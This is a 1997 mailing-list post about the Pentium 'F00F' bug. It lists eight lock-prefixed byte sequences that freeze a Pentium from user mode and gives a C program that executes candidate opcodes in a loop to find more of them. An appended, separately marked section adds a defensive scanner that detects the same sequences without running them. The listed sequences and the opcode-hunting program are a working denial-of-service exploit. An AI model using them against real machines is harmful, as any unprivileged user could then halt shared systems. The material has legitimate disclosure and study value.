More Pentium DEATH

Richard B. Johnson (root@chaos.analogic.com)
Fri, 7 Nov 1997 19:13:00 -0500 (EST)


The following simple program can be modified to find more illegal
opcodes that don't produce an illegal-opcode trap. These opcodes
allow a user to stop a Pentium machine.

The following illegal opcode strings have already been found.

0xf0, 0x0f, 0xc7, 0xc8
0xf0, 0x0f, 0xc7, 0xc9
0xf0, 0x0f, 0xc7, 0xca
0xf0, 0x0f, 0xc7, 0xcb
0xf0, 0x0f, 0xc7, 0xcc
0xf0, 0x0f, 0xc7, 0xcd
0xf0, 0x0f, 0xc7, 0xce
0xf0, 0x0f, 0xc7, 0xcf

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* Candidate instruction: F0 (LOCK prefix), 0F (two-byte opcode escape),
 * then the two bytes the loop below counts through, and a trailing 0x00.
 * The array is jumped to directly, so the data segment must be
 * executable, as it was on the 1997 Linux systems this was written for. */
unsigned char c[] = {0xf0, 0x0f, 0x00, 0x00, 0x00};

int main(void)
{
	int i;
	unsigned short *punch;
	void (*f)(void) = (void (*)(void)) c;

	/* punch overlays c[2] and c[3]; on little-endian x86 incrementing it
	 * steps c[2] through 0x00..0xff with c[3] taking the carry. */
	punch = (unsigned short *) &c[2];

	for (;;) {
		(*punch)++;

#ifdef OPCODES_FOUND_SO_FAR
		/* Skip the sequences already known to hang the machine so the
		 * search can continue past them (c[2] is the low byte, so
		 * 0xc8c7 means c[2] == 0xc7, c[3] == 0xc8). */
		if (*punch == 0xc8c7)
			(*punch)++;
		if (*punch == 0xc9c7)
			(*punch)++;
		if (*punch == 0xcac7)
			(*punch)++;
		if (*punch == 0xcbc7)
			(*punch)++;
		if (*punch == 0xccc7)
			(*punch)++;
		if (*punch == 0xcdc7)
			(*punch)++;
		if (*punch == 0xcec7)
			(*punch)++;
		if (*punch == 0xcfc7)
			(*punch)++;
#endif

		/* Execute each candidate in a child so an illegal-opcode trap
		 * kills only the child; the parent waits and tries the next one.
		 * The "Trying" line is flushed before the jump so the last
		 * sequence printed is the one that stopped the machine. */
		switch (fork()) {
		case 0:
			fprintf(stdout, "Trying %02X %02X\n", c[2], c[3]);
			fflush(stdout);
			(*f)();
			exit(0);
		case -1:
			fprintf(stderr, "Fork failed\n");
			break;
		default:
			wait(&i);
		}
	}
}

Cheers,
Dick Johnson

Richard B. Johnson
Project Engineer
Analogic Corporation
Penguin : Linux version 2.1.60 on an i586 machine (66.15 BogoMips).
Warning : It's hard to remain at the trailing edge of technology.
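For readers who want to check a binary or a captured instruction stream for the eight sequences listed in the post rather than execute them, here is an added example; it is not part of the original message. The eight strings share the bytes F0 0F C7 and differ only in the fourth byte, C8..CF, which is a ModRM byte with mod = 11 (register operand) and reg = 001, the register form of CMPXCHG8B (0F C7 /1). Decoding those fields instead of comparing against a table of eight literals shows why the list has exactly eight entries and rejects the memory-operand forms and the other reg values. The sample buffer is constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The listed sequences: F0 (LOCK prefix), 0F C7 (two-byte opcode),
 * then a ModRM byte with mod = 11 (register operand), reg = 001,
 * rm = 000..111, i.e. C8..CF. */
#define PREFIX_LOCK 0xF0
#define OPCODE_ESC  0x0F
#define OPCODE_BYTE 0xC7

/* Return 1 if modrm is one of C8..CF (mod = 11, reg = 001), 0 otherwise. */
int is_listed_modrm(uint8_t modrm)
{
	unsigned mod = modrm >> 6;
	unsigned reg = (modrm >> 3) & 7;
	return mod == 3 && reg == 1;
}

/* Return 1 if the four bytes at buf are one of the listed sequences. */
int matches_at(const uint8_t *buf, size_t len)
{
	if (len < 4)
		return 0;
	return buf[0] == PREFIX_LOCK && buf[1] == OPCODE_ESC &&
	       buf[2] == OPCODE_BYTE && is_listed_modrm(buf[3]);
}

/* Scan buf at every byte offset (no instruction-length decoding, so a
 * match inside another instruction's immediate is still reported).
 * Stores up to max_offsets match offsets and returns the total found. */
size_t scan(const uint8_t *buf, size_t len, size_t *offsets, size_t max_offsets)
{
	size_t n = 0;
	for (size_t i = 0; i + 4 <= len; i++) {
		if (matches_at(buf + i, len - i)) {
			if (n < max_offsets)
				offsets[n] = i;
			n++;
		}
	}
	return n;
}

/* Constructed sample for this example: two listed sequences mixed with
 * near misses that a correct check must not flag. */
static const uint8_t sample[] = {
	0x90,                    /* nop */
	0xF0, 0x0F, 0xC7, 0xC8,  /* listed: ModRM C8 (offset 1) */
	0xF0, 0x0F, 0xC7, 0x0F,  /* same opcode, memory operand (mod = 00): not listed */
	0x0F, 0xC7, 0xCF,        /* no LOCK prefix: not listed */
	0xF0, 0x0F, 0xC7, 0xCF,  /* listed: ModRM CF (offset 12) */
	0xF0, 0x0F, 0xC7, 0xD0,  /* mod = 11 but reg = 010: not listed */
	0xC3                     /* ret */
};

static size_t sample_offsets[8];

/* Scan the constructed sample; fills sample_offsets and returns the count. */
size_t scan_sample(void)
{
	return scan(sample, sizeof sample, sample_offsets,
	            sizeof sample_offsets / sizeof sample_offsets[0]);
}

int main(void)
{
	size_t n = scan_sample();
	printf("%zu listed sequence(s) in sample\n", n);
	for (size_t i = 0; i < n && i < 8; i++) {
		size_t off = sample_offsets[i];
		printf("  offset %zu: %02X %02X %02X %02X\n", off,
		       sample[off], sample[off + 1], sample[off + 2], sample[off + 3]);
	}
	return 0;
}
```

To check a real file, read it into a buffer and call scan() on it; because the scan is byte-wise and not aligned to instruction boundaries, a hit in a data section or in an immediate operand is a candidate to inspect, not proof that the sequence is ever executed.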